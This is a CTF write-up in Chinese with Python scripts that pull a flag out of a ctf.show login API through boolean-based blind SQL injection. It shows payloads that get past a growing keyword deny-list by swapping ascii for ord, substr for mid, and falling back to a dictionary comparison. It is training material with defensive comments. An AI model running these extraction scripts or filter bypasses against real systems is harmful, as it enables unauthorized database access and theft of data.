基礎指令碼
import requests

# Boolean-based blind SQL injection probe from the write-up, aimed at one
# challenge instance (the URL below is instance-specific and not reusable).
# The application's response body is used as a one-bit oracle, so each
# character of the targeted value is recovered with a binary search over the
# printable ASCII range.
# Defensive takeaway: the server presumably assembles its SQL by string
# concatenation (the "admin'" prefix closes an open quote). Parameterized
# queries remove the injection itself, and returning one generic message for
# both "no such user" and "wrong password" removes the oracle this relies on.
url = 'http://9980403b-660a-4aa7-90a0-c791e0e00ca6.challenge.ctf.show/api/index.php'
result = ''  # characters recovered so far
i = 0  # 1-based position inside the concatenated value (MySQL substr is 1-based)
while True:
    i = i + 1
    # Search bounds: printable ASCII, [32, 127).
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        data = {
            "username": f"admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
            "password": "1"
        }
        r = requests.post(url, data=data).text
        # The literal keeps its backslashes, so it matches the escaped form
        # \u5bc6\u7801\u9519\u8bef ("wrong password" in Chinese) as it would
        # appear in a JSON-escaped body. Its presence is taken to mean the
        # injected condition held, i.e. the code point is above mid.
        if '\\u5bc6\\u7801\\u9519\\u8bef' in r:
            low = mid + 1
        else:
            high = mid
    # If no comparison was ever true, low never moved off 32: substr() returned
    # an empty string (position past the end), so the value is complete.
    if low != 32:
        result += chr(low)
    else:
        break
print(result)
過濾1:
if(preg_match('/file|into|ascii/i', $username)){
繞過姿勢:使用ord代替ascii
# Same request body as the basic script with ascii() replaced by ord(), the
# substitution the write-up uses once the filter rejects "ascii". The loop
# that supplies i and mid is not shown here.
# Defensive note: a keyword deny-list like the one being bypassed is not a
# fix, since equivalent built-ins exist; parameterized queries are.
data = {
    "username": f"admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
    "password": "1"
}
過濾2:
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
繞過姿勢:使用字典直接對比是否正確
import requests

# Dictionary-comparison variant used once ascii/ord/hex are filtered: rather
# than binary-searching a code point, each position is tested against every
# candidate character directly, so it needs up to len(dic) requests per
# character instead of about seven. The instance URL is specific to the
# write-up. Note that the name `re` below shadows the stdlib module.
url = "http://128f6cc0-3428-4086-8f43-384bac13bae8.challenge.ctf.show/api/index.php"
out = ''  # characters recovered so far
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'  # candidate alphabet: braces, '-', digits, lowercase letters
for j in range(1, 50):  # positions 1..49 (MySQL substr is 1-based); no early stop at end of value
    for k in dic:
        data = {
            'username': f"0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        re = requests.post(url, data=data)
        # Same "wrong password" oracle as the basic script: seeing the escaped
        # message means candidate k is the character at position j.
        if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
            out += k
            print(out)
            break  # move to the next position; if nothing matched, nothing is appended for j
這種方式在前兩種過濾下也可以直接使用,但是會慢一點
過濾3:
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
繞過姿勢:使用 mid 代替新增被過濾的 substr,也可以用 left 和 right
# Request body with substr() swapped for mid() after "substr" joins the filter;
# the surrounding loop that supplies j and k is not shown. The FROM clause
# names ctfshow_flxg here, not ctfshow_fl0g as in the earlier scripts.
data = {
    'username': f"0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),{j},1)='{k}',1,0)#",
    'password': '1'
}
這裡的庫名改了
過濾4:
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
繞過姿勢:可以使用 lpad 和 rpad,也可以和上一個一樣用 mid